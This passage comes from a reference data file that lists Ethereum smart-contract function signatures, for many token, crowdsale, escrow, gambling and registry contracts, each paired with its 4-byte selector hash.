"initialize(address,uint256)": "0xcd6dc687", "_recordPresalePurchase(address,uint256)": "0xc701672f", "_min256(uint256,uint256)": "0xb2b6e37e", "_preValidatePurchase(address)": "0x1785478c", "setPresaleAllocation(address,uint256)": "0x83fae425", "getPresaleAllocation(address)": "0xb19fde5a", "getNumPresaleTokensBought(address,address)": "0xb0e1aaa5", "getNumRegularTokensBought(address,address)": "0xee08022a", "getInvestorsLength()": "0xe3cc65e2", "getInvestorAtIndex(uint256)": "0xfbdafaf9", "transferTokensWithOffsetAndLimit(uint256,uint256)": "0xf921991c", "transferTokens()": "0x1792b0bc", "disableSale()": "0x0a4740ff", "enableSale()": "0xc683d8e4", "recordPresalePurchase(address,uint256)": "0x57eb3431", "buyPresaleTokens()": "0x7a0b294c", "Crowdsale(address,uint256,uint256,uint256)": "0xdfb5f420", "PaquariumToken(uint256,string,uint8,string)": "0xaf4b382d", "tokenFallback()": "0xbd23eb39", "CHEXToken(address,uint256,uint256)": "0xdbfec8b7", "checkIfAddressIsWhitelisted(address,address)": "0x0de41aa4", "addAddressToWhiteList(address,address)": "0x60c82d6f", "buy(address,uint256,uint256)": "0xa59ac6dd", "JFBToken()": "0x7e3f5b70", "getAccountInfo()": "0x1b9e16ad", "getBlocksUntilStart()": "0x46f8e5ec", "redeemPayout()": "0x20f4d7aa", "buyin(address)": "0xfe985cb9", "logicVersion()": "0x1946fdf4", "forbiddenAction()": "0xb3350f03", "setup(address,address,address,address)": "0x54c35a3c", "numberOfProposals(string)": "0xe35f0254", "confirmProposal(string,uint256)": "0x4fad404a", "updateTransferFeeRate(uint256)": "0x548d4a54", "updateTransferMinimumFee(uint8)": "0xdf49dfe3", "transferFee(address,address,uint256)": "0x59d5d02a", "IkuraAuthority()": "0xaff8c7ab", "logicVersion(address)": "0xb8a582af", "confirmProposal(address,bytes32,uint256)": "0xfb9734fc", "selectOwnerAddressForTransactionFee(address)": "0x429cddca", "updateTransferFeeRate(address,uint256)": "0x25f0f467", "updateTransferMinimumFee(address,uint8)": "0x915a405f", "transferFee(address,address,address,uint256)": "0x9b76a25c", "transferMinimumFee(address)": "0x112fbe9b", "transferFeeRate(address)": "0x58cf9570", "tokenBalanceOf(address,address)": "0x1bea8006", "allowance(address,address,address)": "0x927da105", "totalSupply(address)": "0xe4dc2aa4", "IkuraToken()": "0x79a9e9ea", "executeUpdateTransferFeeRateProposal(uint256)": "0xa45a7371", "executeUpdateTransferMinimumFeeProposal(uint256)": "0xb42963f8", "executeBurnProposal(uint256)": "0x379986d9", "executeMintProposal(uint256)": "0x555e6582", "isProposalNotExpired(bytes32,uint256)": "0x5f3c23be", "numberOfActiveProposals(bytes32)": "0xff025819", "numberOfProposals(bytes32)": "0x796d67da", "isProposalExecutable(bytes32,uint256,address,bytes)": "0x222160c0", "proposalExpireAt(bytes32,uint256)": "0x3929e43f", "confirmedTotalToken(bytes32,uint256)": "0x15d887a7", "hasConfirmed(bytes32,address,uint256)": "0xfafaacfa", "confirmProposal(bytes32,address,uint256)": "0x7f3f81c0", "newProposal(bytes32,address,uint256,uint8,uint256,bytes)": "0x1750f564", "IkuraAssociation()": "0x632ccecd", "IkuraStorage()": "0xec582a00", "detailsOf(string,string)": "0x072e4308", "sendEther(string)": "0x1809ced7", "wipeAttributes(string,bytes32[])": "0xde9122f7", "setAttribute(string,string,bytes)": "0x26f590f6", "useName(string)": "0x97fe728a", "setPrice(string,uint256)": "0x22e01192", "transferFrom(address,address,string)": "0x3ebfc934", "approve(address,string)": "0x29cd00f7", "transfer(address,string)": "0x09886649", "Ethername()": "0xf5b0f72d", "_bytes32ToString(bytes32,bytes32)": "0x356f083e", "_stringToBytes32(string,string)": "0x0853ea45", "triggerTime()": "0x370fb47b", "teamOnePrefix()": "0x73705090", "controllerSet()": "0x02072579", "preemption()": "0xa1b22154", "InterfaceId_ERC721Exists()": "0x7d1286f6", "coinTradeStart()": "0xbf604019", "percentageToToteLiquidatorWallet()": "0xf4bead6e", "gameRunning()": "0x6e8c2caf", "noahToken()": "0x281134bc", "roundFailedToStart()": "0xc29224ea", "team1Query()": "0x1bb1bf2e", "lastBlock_a19()": "0x174cd9b3", "totalInactive()": "0x6377ff20", "payoutAddr()": "0x36c4ff7a", "bountyPercent()": "0xbfd2ed01", "AdvanceQueue()": "0x7ca2795f", "teamEndTimestamp()": "0xac00c3e6", "bonusTokens()": "0x76ba242c", "buyerfee()": "0x9be7f1dd", "share2()": "0xd7ba95ca", "Riddle()": "0x5ce398c4", "topWizard()": "0xcf3e52d9", "incomeFees()": "0x3318d4a5", "numBuckets()": "0xbfdcc9a2", "tdeFundsRaisedInWei()": "0x43581c80", "BONUS_PCT_IN_ICONIQ_SALE()": "0xd541ca5d", "presaleOpeningTime()": "0x07f79d38", "POINTS_TO_SPEND()": "0xa554a72e", "haltPurchase()": "0xd28dcdea", "minSalePrice()": "0x5ca11c34", "CREATOR_TOKEN_END()": "0x4a9b5c2e", "icoPhaseDiscountPercentage1()": "0xce139296", "ensSubdomainRegistrarBase()": "0x3cfb35aa", "TOWN_START_PRICE()": "0x01933c43", "firstAuctionsExtendedDuration()": "0x300e7b2d", "mintAmount4()": "0xf1b5bc17", "weisRaised()": "0xda5f838d", "maxChequeValue()": "0x93c573c0", "isIcoSucceeded()": "0x2c5fac89", "trancheNumerator()": "0x1a833d3f", "LemonContract()": "0x53c549da", "freeMoney()": "0x97a09338", "lpFeeBp()": "0xd5e38f60", "extraBalanceWallet()": "0x14841164", "collectedNDAO()": "0x0965c4b2", "preICOEndDate()": "0xe75ea9da", "minDonationInWei()": "0x12efe5ad", "BLOCK_PER_PHASE()": "0xfafe805e", "consecutiveDeaths()": "0xaf8472b1", "Total_Amount()": "0x208318bd", "result_payto()": "0xc5fbe723", "result_amount()": "0x6e2a2d0a", "onlyPay()": "0x4491fe8f", "BIGTPrivate()": "0x7406d943", "bonusOver10ETH()": "0xecdd9549", "PERCENT_DIVISOR()": "0x4870dd9a", "predecessorAddress()": "0x08ffce24", "devAccount()": "0x691edfda", "icoPhaseCountdown()": "0x489b1636", "VRF_EGG_COST()": "0x88af6534", "participantsLength()": "0x4158506a", "minPerUser()": "0x5f28b383", "concludeCrowdsale()": "0x8863c8d5", "tokenIssuedLockUp()": "0xe280b58f", "roundnum()": "0x91174cb6", "jackpotBalance()": "0x040da8f4", "tradingMonDataContract()": "0x7e27133f", "mainSaleMinEth()": "0x32f8db38", "polyToken()": "0x6faa22a5", "SOFTCAP_RATE()": "0xf2102390", "fighterCore()": "0x5fb6bca2", "DAO()": "0x98fabd3a", "groom()": "0x14f9e35b", "blackList()": "0xcdab73b5", "lockedWallet()": "0x4387d35a", "maximumTokensForThird()": "0x676fc32b", "minSumICOStage6USD()": "0x9af55773", "priceOfEthOnEUR()": "0x2af5cfdd", "whitelistSupplier()": "0x49435c0d", "projectWallet()": "0xbeb08ab9", "exchangeTokenRate()": "0x050642f2", "numOfTeam()": "0x4fedebf6", "tokensToLock()": "0x37ed2bef", "doPayout()": "0x18494108", "FOUNDATION_CAPPED_VALUE()": "0x283ced9d", "devfeetodev()": "0x735dcc8b", "APP()": "0x96ec6fec", "threeHotHoursEnd()": "0x64009184", "isTurnDataSaved()": "0x45fd3666", "stopExchange()": "0xdb40e896", "supplyAdjuster()": "0x190038dc", "stageOneCap()": "0xe549114b", "ico2Ended()": "0x0b99ccee", "minInvestBTC()": "0xabc2a40a", "totalTimelockedBeneficiaries()": "0x332b3177", "pullTokensBack()": "0xd300746f", "getTotalBraggedVolume()": "0xb2a9ab9c", "lastBlock_v1()": "0xd660ea36", "categoryId()": "0xb503a2b9", "mintingStartTime()": "0xdfef5f69", "shaThree(string)": "0xfa77c074", "IranToken()": "0x67c36757", "falangiToken()": "0x1414a506", "JuvToken()": "0x0f78d408", "Human1StandardToken(uint256,string,uint8,string)": "0x00d7f5d8", "addDeal(uint256,string,string,uint256,string,bytes32)": "0xf981aaca", "BDCC()": "0x30835cc5", "dispatchTokens(address,uint256)": "0x8e69ceec", "withdrawXPI(uint256)": "0xee0d9c61", "FutaToken()": "0x41c2c8f6", "W0kiT0ken()": "0x52529852", "XEPToken()": "0xc31bb2fb", "TerraToken(uint256)": "0xa3d87805", "WE3TOKEN()": "0x2dd1a932", "ZXGToken()": "0xb0b60b06", "VerumToken()": "0x47dd33fb", "signArchive(bytes32,string)": "0x81bb73af", "ArchiveCreation()": "0x081f74c6", "makeschoolToken()": "0x16537a85", "BitcoinPurple()": "0xd0e075c7", "MIRC()": "0xf861d2bf", "qquizwinnerToken()": "0x857b575e", "_calculateLockedBalance(address)": "0xb80756f0", "removePolicyFrom(address)": "0x5ee679f9", "replacePolicyTo(address,uint8)": "0xd4ca68ea", "jade(uint256)": "0xc26dd189", "jadeRec(uint256,uint256)": "0x2aa5411f", "iWantXJade(uint256)": "0xbe3cbb04", "calcJadeReceived(uint256,uint256)": "0x0c432c8d", "getMegaBalance()": "0x273ca81c", "setMegaAddress(address)": "0x206d1fde", "anubisToken()": "0xe02fab06", "LMA()": "0x8f5f20c2", "FaucetsToken()": "0xf7b4feec", "SingularityTest5()": "0xb3311309", "get_property_contact(uint256)": "0x85e050e4", "get_property_facility(uint256)": "0x24b07165", "get_property_layout(uint256)": "0x3a1ca19e", "get_property_address(uint256)": "0x33e8df7e", "get_property_basic_info(uint256)": "0x73c32a71", "set_property_contact(uint256,string,string,string)": "0x172e0456", "set_property_facility(uint256,bool,bool,string)": "0x44fc709e", "set_property_layout(uint256,string,string,string)": "0xe30addb4", "set_property_address(uint256,string,address,string,string,string)": "0xa8e6f9dc", "mint(string,uint256,uint256,uint8,string)": "0xaf481be8", "makeReferalBonus(uint256)": "0x75d7348a", "houseWithdraw(uint256)": "0x7a1126f0", "pendingWithdrawalsBalance()": "0xd2b022d5", "safeSendFunds(address,uint256)": "0x406d81c7", "clearStorage(bytes32[])": "0xfd2457d7", "settleBet(bytes32,bytes32)": "0xb537f5b5", "refundBet(bytes32)": "0xdf320b29", "getDiceWinAmount(uint256,uint256,bool,bool)": "0x876b0a95", "placeBet(uint8,bool,uint256,uint256,bytes32,uint8,bytes32,bytes32)": "0x68f319b1", "createInviteID(address)": "0xb76689a4", "forward(address)": "0x101e8952", "TelewaveCoin()": "0x3a333d30", "VictusToken()": "0xdc706a3a", "fechVoteResultForCandidate(address,uint256)": "0xf353108b", "fechVoteNumForCandidate(address,uint256)": "0x37e531c0", "fechAllForCandidate(uint256)": "0x1812982c", "fechVoteInfoForVoter(address,uint256)": "0x10fcdecc", "changeStageBlcok(uint256)": "0x6d578781", "SingularityTest6()": "0xcedadaca", "saveMetaData(address,bytes32,bytes32)": "0xe681f989", "saveMetaData(address,bytes32,bytes32,bytes32,bytes32,uint32,uint256,uint256,bytes32,uint256)": "0xee556b5b", "setPendingSignatureStatus(address,uint256)": "0x3ba8b0a8", "hashData(string)": "0x04b7dcde", "getPendingSignatureStatus(address)": "0xaac0e4c5", "hasSongWriterSigned(address)": "0x2ed9859f", "songWriterSign()": "0x8095ab76", "addSongWriter(string,uint256,address)": "0x4aef05a5", "addSongData(string,string,string,string)": "0xd1a1f5ba", "myAccessLevel()": "0x9f674eb3", "getAccessLevel(address)": "0x5bc008a0", "setAccessLevel(address,uint256)": "0x3a7327a3", "t3Token()": "0x9b252b7e", "Alice()": "0x9877bdff", "NESTFAME()": "0x24571783", "mint(string,uint256,uint8,string)": "0x2af1c247", "MunishExchange(address)": "0x86b76d6c", "VersusArenaToken()": "0x00b23740", "tenmarionCoin()": "0xa5b3d1a9", "abbcwalletcoin()": "0x8c787768", "addMadeTX(address,uint256,uint256,uint256,uint256)": "0x86dc88ff", "getMadeTXFund(uint256)": "0xd151ec28", "getMadeTX(uint256)": "0xb0d4ff96", "getMadeTXCount()": "0x880613ee", "ProdCToken()": "0xf456106d", "EmjacToken()": "0x8e2a8312", "EthereumOne()": "0x3728f1f7", "Etheradium()": "0x4ee67d33", "ZZCoinToken()": "0x57727a04", "getDeployedTokens()": "0x622ae7aa", "createToken(string,string,uint32,uint256,uint256)": "0x98f23a6d", "_timeLimit(uint256)": "0xff97278f", "AsheToken()": "0x8d0ae472", "bulkRemove(address[])": "0x0e037cc0", "bulkAdd(address[])": "0x0650b590", "getBPhashFromBPTokenId(address,uint256)": "0x8760b171", "modifyCategory(uint256,string,string)": "0x9ff71ccb", "Ebets()": "0x01e4741c", "createController(address,address,address,uint256,uint256,uint256,uint256,uint256)": "0xcfcb2b7e", "createProxy(address,address,uint256,uint256,uint256,uint256,uint256,address,uint256,string,uint8,string,bool)": "0xde2a9778", "LiquidDemocracyControllerFactory(address)": "0x6240282c", "transferFromInternal(address,address,uint256)": "0xbbdaebe2", "payoutMethodABI()": "0xa4d69fd3", "refundMethodABI()": "0xfb687c24", "contributeMethodABI()": "0x8e3390b4", "getDataFromAddress(address)": "0xc1408cda", "isAddressExpired(address,uint32)": "0xede963d1", "getExpirationTime()": "0xe23a845a", "getExpirationTimeFromAddress(address)": "0xc5c8a08a", "getTimeLeft()": "0xc7e284b8", "kick(uint32)": "0x3b5a938a", "CreateDMSContract(address,bytes32,uint32)": "0x2326ef22", "DMSContract()": "0x4d22b9c8", "TestERC20Token(string,string,uint256)": "0xfe3e0efd", "Water(string,string)": "0x8c379133", "Retire()": "0xbe63c8ca", "ClosePatent(bytes32)": "0xeedbd7eb", "WhoHoldsPatentFor(bytes32)": "0x0201e253", "NewPatent(bytes32)": "0xf5d00ccf", "SetPatentProperties(uint256,uint256)": "0xb5fa2044", "RevokeDOT(bytes32,bytes)": "0xc8bdc0c7", "RevokeEntity(bytes32,bytes)": "0x101b6106", "AddChain(bytes)": "0xb4b3b028", "CheckDOT(bytes32)": "0xcc0e24e1", "CheckEntity(bytes32)": "0xae8efe46", "AddEntity(bytes)": "0xfd3b34e6", "AddDOT(bytes)": "0xf73cc97c", "AddRevocationBounty(bytes32)": "0x74fe9247", "GetDChainRevokableHash(bytes32,uint32)": "0xeef93611", "GetDChainNumRevokableHashes(bytes32)": "0x05d56a4e", "GetDOTRevokableHash(bytes32,uint32)": "0x24f618b6", "GetDOTNumRevokableHashes(bytes32)": "0x84ea2e31", "ADChainGrants(bytes32,bytes8,bytes32,bytes)": "0x8c7565dc", "UnpackRevocation(bytes)": "0xe5731b77", "SliceByte32(bytes,uint32)": "0xce7a94eb", "GetDChainDOTHash(bytes32,uint8)": "0xda3cd674", "UnpackAccessDChain(bytes)": "0x22af1b27", "GetEntityDelegatedRevoker(bytes32,uint8)": "0x3afe3a8a", "UnpackEntity(bytes)": "0xe7b686a7", "GetDOTDelegatedRevoker(bytes32,uint8)": "0xe0031b1d", "UnpackDOT(bytes)": "0x3aab47b2", "VerifyEd25519(bytes32,bytes,bytes)": "0x0b35fe44", "VerifyEd25519Packed(bytes)": "0x70d695f7", "contractSignedTime(string)": "0x8db4dad2", "contractIsCanceled(string)": "0x87214728", "contractIsCompleted(string)": "0x67fe6b47", "isContractSignedBySigner(string,address)": "0xcfd00530", "signDigitalContract(string)": "0xd14779c4", "cancelDigitalContract(string)": "0xb146bdee", "newDigitalContract(string,address[])": "0x55a36746", "assertEq0(string,string)": "0x05b6d298", "getBalanceByAdress(address,address)": "0xce95b475", "Corporation()": "0x6b270056", "cancelRegistration(address)": "0x6bdc06f5", "maxCapacity()": "0x59b6a0c9", "numberOfAttendees()": "0xc31ceb2a", "stakeRequired()": "0x05010105", "getTogetherDate()": "0xe128f0d6", "coupon()": "0x55c01345", "getByUser(address)": "0xd67bf379", "hasSigned(bytes32,address)": "0x29832c0f", "setUserIdentityDocs(string)": "0x0a4d7cd7", "setUserTransactions(string)": "0x65b6cd66", "getUserTransactions()": "0x6fe691dc", "getUser(address)": "0x6f77926b", "setBlocklancerToken(address)": "0x62e534d2", "setBlocklancerContractHolder(address)": "0x9bc0fd25", "setTokenHolderTribunal(address)": "0x23198b98", "BlocklancerDataHolder()": "0x75e372f2", "returnTuple()": "0x39009482", "greet(address,string)": "0x09da52a2", "Mortal()": "0x1417c845", "TestNetReputationToken()": "0xe53910a2", "getObjectValueByKey(string,string)": "0x799d916b", "jsonCat(string,string,address)": "0x7296dae6", "jsonCat(string,string,int256)": "0x4bd5610d", "jsonCat(string,string,uint256)": "0x50077f00", "jsonCat(string,string,string)": "0x4be9d332", "jsonCat(string,string)": "0x349eb329", "lastJson()": "0xddcd7ee9", "jsonUpdate(string,string,string)": "0x39eda73b", "jsonArrayLength(string,string)": "0x58a383fd", "jsonKeyExists(string,string)": "0xc43823e1", "jsonRead(string,string)": "0xbda81086", "isJson(string)": "0xf5963aa5", "addressToBytes(address,address,address)": "0xe944f52d", "buildRequest(string)": "0x2d17d956", "setRecipient(string)": "0x795a16e3", "ShapeshiftBotSolo(string)": "0xe149fbfa", "getVoteTokens()": "0xaf5c4540", "getReceipt(bytes32)": "0xfcecbb61", "registerVoteToken(bytes32,bytes32)": "0x033e7ef4", "maintenanceMode(bool)": "0x7235d2b1", "bookAndCalcRemainingPremium()": "0x20bfa95c", "FlightDelayNewPolicy(address)": "0xc67ce6f5", "changeGreeting(string)": "0xd28c25d4", "get_balance()": "0xc1cfb99a", "withdraw_all_admin(address)": "0x322eccdc", "withdraw_admin(uint256)": "0x7bacd526", "get_my_info()": "0x26bca0f8", "get_member_info(address)": "0x9cbc2d62", "inactive_withdraw(address)": "0x4b106893", "active_withdraw(address)": "0xd7dae83c", "inactive_dividend(address)": "0xe44501c4", "active_dividend(address)": "0x338e93d1", "inactive_withdrawable()": "0x7b362143", "active_withdrawable()": "0xc250a312", "inactive_payable()": "0x378e061e", "active_payable()": "0xf843545c", "set_exchange_rate_in_eth(uint256)": "0x12cc1abc", "set_deposit_address(address)": "0x95a235ae", "del_admin(address)": "0x8ccb9f2d", "add_admin(address)": "0x13a070b7", "set_exchange_rate(uint256[])": "0x50d2bfab", "Pixiu_Beta()": "0x6bd37274", "BCBcyCoin()": "0xe4d74f2e", "TTAC()": "0x939bfc79", "fromHex(string)": "0x8e7e34d7", "fromHexChar(uint256)": "0xb7312707", "devWithdraw(uint256)": "0xc543c922", "contractWithdraw(uint256)": "0xa6fb08ae", "deWhiteListContract(address)": "0xc5689e7d", "whiteListContract(address)": "0xb44ec921", "permissibleWithdrawal(uint256)": "0x181f1437", "GenieToken()": "0x15045c3e", "CC5Coin()": "0x8de8de61", "stringTobytes32(string)": "0xcb42a77b", "setPartnerFromPreICOAffiliate(address[],bytes32[],uint256[])": "0xde63dc35", "CreditCarToken()": "0x43a335d6", "KAPAYcoin(uint256,string,string)": "0x1e44b919", "CoinBroToken()": "0xa7ea48cf", "getJobHash(bytes16,address,address,uint256,uint256)": "0x59756526", "checkRefundSignature(uint8,bytes,address)": "0xf7048161", "validateRefundSignature(uint8,bytes,address)": "0xbe457017", "getJobValue(bytes16,address,address,uint256,uint256)": "0xa7b71dca", "getActualCompletionDate(bytes16,address,address,uint256,uint256)": "0x1fabe6cf", "getAgreedCompletionDate(bytes16,address,address,uint256,uint256)": "0xddf34ab0", "getSecondsToComplete(bytes16,address,address,uint256,uint256)": "0xb53eb39f", "getJobCanCancelAfter(bytes16,address,address,uint256,uint256)": "0x3585609b", "getJobStatus(bytes16,address,address,uint256,uint256)": "0x6425fbed", "getContractVersion()": "0x8aa10435", "getMaxSend()": "0x39c7b6fc", "setMaxSend(uint256)": "0x1aea4d0f", "howMuchInEscrow()": "0x81e83991", "howManyFees()": "0xe195f2ec", "resolveDispute(bytes16,address,address,uint256,uint256,uint8)": "0x9c007973", "requestDispute(bytes16,address,address,uint256,uint256)": "0x3f20fa9e", "processMutuallyAgreedJobCancellation(bytes16,address,address,uint256,uint256,uint8,bytes,bytes)": "0xed6e7f7a", "requestMutualJobCancellation(bytes16,address,address,uint256,uint256)": "0xc8081bd2", "hirerCancel(bytes16,address,address,uint256,uint256)": "0x5b2ccdec", "contractorCancel(bytes16,address,address,uint256,uint256)": "0x68fd0455", "jobCompleted(bytes16,address,address,uint256,uint256)": "0x1c73561f", "jobStarted(bytes16,address,address,uint256,uint256)": "0x55042668", "hirerLastResortRefund(bytes16,address,address,uint256,uint256)": "0x7c7eeaa1", "contractorReleaseFunds(bytes16,address,address,uint256,uint256)": "0xfe5a4e2d", "hirerReleaseFunds(bytes16,address,address,uint256,uint256)": "0x94eedaa4", "createJobEscrow(bytes16,address,address,uint256,uint256,uint32,uint32)": "0xe63df4a7", "isApprovedWallet(address)": "0x728f3a21", "deleteApprovedWalletAddress(address)": "0x3af05903", "addApprovedWalletAddress(address)": "0xf13375bd", "changePrimaryApprovedWallet(address)": "0x874b953a", "isArbitrator(address)": "0x9f6bd2a9", "deleteArbitrator(address)": "0xf27d0afe", "addArbitrator(address)": "0x01fabd75", "changePrimaryArbitrator(address)": "0xc15f05fb", "getFundingInfoForUser(address)": "0x06d145c9", "getCurrentlyRunningPhase()": "0x1b35f56f", "DroneTokenSale(address,address)": "0x0be5430f", "setTiersInfo(uint8,uint256[],uint256[],uint256[],uint8[3][4])": "0x68649c8a", "saleTimeOver()": "0x8b6932f1", "isRefunding()": "0x9d6fb020", "activateRefund()": "0x3cdb3aa6", "activateWithdrawal()": "0x8fe91976", "Vault(address)": "0x94d762c3", "TSB()": "0x526ba9fa", "RetDime()": "0xb8ba427d", "Telcoin()": "0x1496fc4c", "HappyBirthdayToken()": "0x341855bf", "TokenCLCC(uint256,string,string)": "0x3d45b9ef", "makeOptions(uint256,address,uint256)": "0x46d0e892", "manualyMintTokens(uint256,address,uint256,int256)": "0x18ff1361", "closeManualyMining()": "0x1588ce09", "indexSuperInvestor(uint256)": "0x03d38296", "addBonusPeriod(uint64,uint64,uint256,uint8,uint256,uint8)": "0xdab30ccc", "referalPayByNum(address,uint32)": "0x887ffc9c", "referalPayCount(address)": "0x97173a7a", "referalAddrByNum(address,uint32)": "0xaee338ef", "referalCount(address)": "0xe827653c", "addReferral(address,uint256)": "0x09f4fc61", "processReferral(address,address,uint256)": "0xfcd307c4", "COINECTToken()": "0xc78d7380", "release_remain()": "0x2dd6ba7e", "release_4()": "0x8569cc4e", "release_3()": "0x92a793d0", "release_2()": "0x3073530b", "release_1()": "0x2f4ea4ee", "Metropolis()": "0x3166e133", "CicadaToken()": "0x82699367", "DWEToken()": "0x3b340ceb", "done(address)": "0x7be8f86b", "distribute(address)": "0x63453ae1", "setHmcAddress(address)": "0xd54a6bfb", "HmcDistributor()": "0x06c270be", "findBalance(address)": "0xcfba4fe0", "transferAdminShip(address)": "0x1ebcbc93", "Lexcoin()": "0x57332f08", "CashTron()": "0x0c59c570", "getLockTimestamp(string)": "0xbfae8867", "getAvailableAmount(string)": "0xfd3eefe9", "transfer(string,address,uint256)": "0xaa2fddc7", "registerPool(string,uint256,uint256)": "0xb7c97930", "_getShipInfo(uint256)": "0x2700615c", "_claimOreAndClear(uint32,uint8)": "0x53775572", "launchShipOnMEA(uint256,uint8)": "0x515f25ae", "claimOreOnlyFromAssetId(uint256)": "0x01c543c2", "totalStarSupplyRemaining(uint8)": "0x6339be39", "totalMEATonsSupply()": "0xf6a84013", "totalMEATonsClaimed()": "0x1da98538", "getStarDistanceInLyThousandths(uint8)": "0xc9c22deb", "withdrawCollectedResources()": "0x3d944953", "getDistributedOreBalances(address)": "0xcd423c99", "getCollectedOreBalances(address)": "0x99325442", "getMEATime()": "0x5ba83c0d", "getResourceERC20Address(uint16)": "0xeddd2d39", "getLastStarOfAssetId(uint32)": "0xbfaad84b", "getAssetIdTripStartTime(uint256)": "0xaf589572", "getAssetIdTripCompletedTime(uint256)": "0x28d905e5", "getAssetIdCargoArray(uint32)": "0x503e11de", "getAllShipStats(uint32[])": "0xb247ed92", "getAssetIdCargo(uint32)": "0x1f0fd905", "reclaimResourceDeposits(address)": "0xd237b43f", "setMEAAttributes(uint256,uint256)": "0x1b672154", "setStarDistance(uint8,uint16)": "0x29760657", "setCSCFactoryERC721(address)": "0xfe9bb2da", "setCSCERC721(address)": "0x9d29255b", "setAllResourceERC20Addresses(address)": "0xf49b728e", "setResourceERC20Address(uint16,address)": "0xf54dd974", "setHiddenLogic(address)": "0x99a17344", "MEAManager()": "0xd04e5586", "setSecondaryManager(address)": "0x825bdb74", "setPrimaryManager(address)": "0xc0619c70", "setOtherManager(address,uint8)": "0xbb1d45fc", "startMEAMission(uint256,uint256,uint8,uint256)": "0x4d15642a", "emptyShipCargo(uint32)": "0x85dc6721", "getAssetCollectedOreBallancesArray(uint256)": "0x7f9c8974", "getAssetCollectedOreBallances(uint256)": "0x44ccbed0", "setResourceForStar(uint8[5],uint16[5],uint32[5])": "0xad4c05f1", "getReturnTime(uint256)": "0x8ede1817", "getStarTotalSupply(uint8)": "0x51cfa44b", "getTotalTonsClaimed()": "0x542aee37", "minutestotal()": "0xd5b3b317", "richtestff(uint256,string,uint8,string)": "0x50cf20dd", "updateStatus(bool)": "0x19e072ef", "setPurchasable(uint256)": "0x0094151b", "transferTreasurership(address)": "0xc59a9428", "AssetToken()": "0x0da304b0", "CarToken()": "0x9cc4a319", "JORDAN()": "0xd879e911", "MANHATTANPROXLENAV()": "0xa632d5e1", "IGTToken()": "0x4e840bea", "updateTokenBalance(uint256)": "0x882dd41e", "changeAgent(address)": "0x57f032e7", "GEE()": "0x894e5e1f", "CarlosMatos()": "0x048cb8e0", "executeOrder(uint256,uint256)": "0xef46e0ca", "createOrder(uint256,uint256,uint256)": "0xa1ba444d", "setOwnerCut(uint8)": "0x05597d88", "setPublicationFee(uint256)": "0xaf8996f1", "isAuthorized(address,uint256)": "0x2972b0f0", "XChain(uint256,string,string)": "0x9fecf214", "VjuCoin()": "0x184ad5ff", "enableWithdrawals(address,address)": "0xab5690c4", "checkWithdrawalAvailable(address)": "0xba76bfb7", "getCapAtTime(uint32)": "0x5e01d395", "getContributorInfo(address)": "0x0bce8cdf", "getPoolInfo()": "0x60246c88", "setContractCap(uint256)": "0x9b46a71c", "setCaps(uint32[],uint256[])": "0x1978658b", "setIndividualCaps(address[],uint256[])": "0x48a935e2", "PresalePool(uint256,address,uint256,uint256)": "0xac65b258", "getSecondPoints()": "0xc11c0cc1", "getFirstPoints()": "0x8f7d4dad", "getKingPoints()": "0xaa647673", "getPlayerInfo(address)": "0x59328401", "forceAdvance()": "0x186e7047", "tryAdvance()": "0x6c1475ad", "withdrawEarnings()": "0xb73c6ce9", "becomeKing()": "0x6708cc63", "calculatePoints(uint256,uint256)": "0xc05ce08f", "EthKing()": "0x5b8fb4ae", "SaxoToken()": "0xdcafa43e", "calculateDemurrage(uint256,uint256)": "0x120c52ef", "DgxDemurrageCalculator(address,address,address,address)": "0x381fe9ca", "token_information()": "0x918657cb", "showDemurrageConfigs()": "0x293f9a9c", "erc20CTH()": "0x31eaa5c9", "EthereumMark()": "0xc3a8da5f", "MMMToken()": "0x326959cc", "RentartoICO()": "0x68ec8446", "Dd(address,address)": "0x4d8b7056", "TheBestICO()": "0x5114a9aa", "TittyFarmer()": "0xd67f4d1b", "BitSelectModerado()": "0x1cfac68e", "readValidDate(uint8)": "0x7e55b83c", "readCompany(uint8)": "0xb4f82c6a", "save(uint256,string,string)": "0x9b563fa3", "blackil()": "0x506cf560", "XECToken(string,string,uint8,uint256)": "0xc113d195", "approveChange(address,uint256,bool)": "0x8bbdfaa6", "Hygen()": "0x49a76444", "changeRecipientAddress(address)": "0x4bf9407f", "deleteShare(address)": "0x18d74c37", "changeShare(address,uint256)": "0xf948d276", "addShare(address,uint256)": "0x50f4f9f8", "doPayments()": "0x3cacf895", "Distribution()": "0x5da5f5ab", "purchaseUpAndSpend(uint256,uint256,bytes32)": "0x64239cce", "spend(uint256,bytes32)": "0xc1955e62", "buyBack(uint256,uint256)": "0x47d8167d", "purchaseSafe(uint256,uint256)": "0xd7cf7bcb", "getBuyBackPrice(uint256)": "0x1f91e309", "OMPxContract()": "0x05d52eeb", "getStatistics()": "0x372d6b27", "trackFee(uint256)": "0x20c93c62", "trackOdd(uint256)": "0x2090d8a6", "trackSpend(uint256)": "0xe75ef9b2", "trackBuyBack(uint256,uint256)": "0xd3f60667", "trackPurchase(uint256,uint256)": "0x006c10e8", "getDiscountByAmount(uint256)": "0x6e2bf348", "getDiscountsAmount()": "0x1ebfa2df", "editDiscount(uint256,uint256,uint256)": "0x1866191a", "addDiscount(uint256,uint256)": "0x0ab68776", "Essential()": "0xa52bc175", "setreleaseFinalizationDate(uint256)": "0xa8c69264", "releaseTokenTransfer(bool)": "0xd1613036", "ELTTokenImpl()": "0xefe37d6f", "ELTToken(address,string,string,uint256,uint256,uint256,address)": "0x9797f51f", "VersionedToken(address)": "0x4d1271e3", "transferByOwner(address,uint256,uint256)": "0x224a1775", "timeVault(address)": "0x2a7e5018", "transferIfRequirementsMet(address,address,uint256,bool)": "0x8c88d716", "checkTransferRequirements(address,address,uint256)": "0x5b8710e5", "transferToContract(address,uint256,bytes,bool)": "0x7be6d2de", "transferToAddress(address,uint256,bytes,bool)": "0x00bd6f4c", "PocketCoin()": "0xe0ee94e9", "roundingPercent(uint256,uint256,uint256)": "0xfa198656", "tradeExecuted(address,uint256)": "0xf1860118", "createOrder(address[3],uint256[4])": "0xa91ce985", "isValidSignature(bytes32,address,bytes)": "0x93634702", "vault()": "0xfbfa77cf", "isOrdered(address,bytes32)": "0x00f29d55", "availableAmount(address[3],uint256[4])": "0x1a197588", "isSubscribed(address)": "0xb92ae87c", "canTrade(address[3],uint256[4],bytes)": "0x08fa0e92", "order(address[2],uint256[4])": "0xc6f54e62", "cancel(address[3],uint256[4])": "0xb1c0e063", "trade(address[3],uint256[4],bytes,uint256)": "0x08218c98", "unsubscribe()": "0xfcae4484", "subscribe()": "0x8f449a05", "HakataCoin()": "0xb2b7d0ce", "Lizun()": "0xe95626c5", 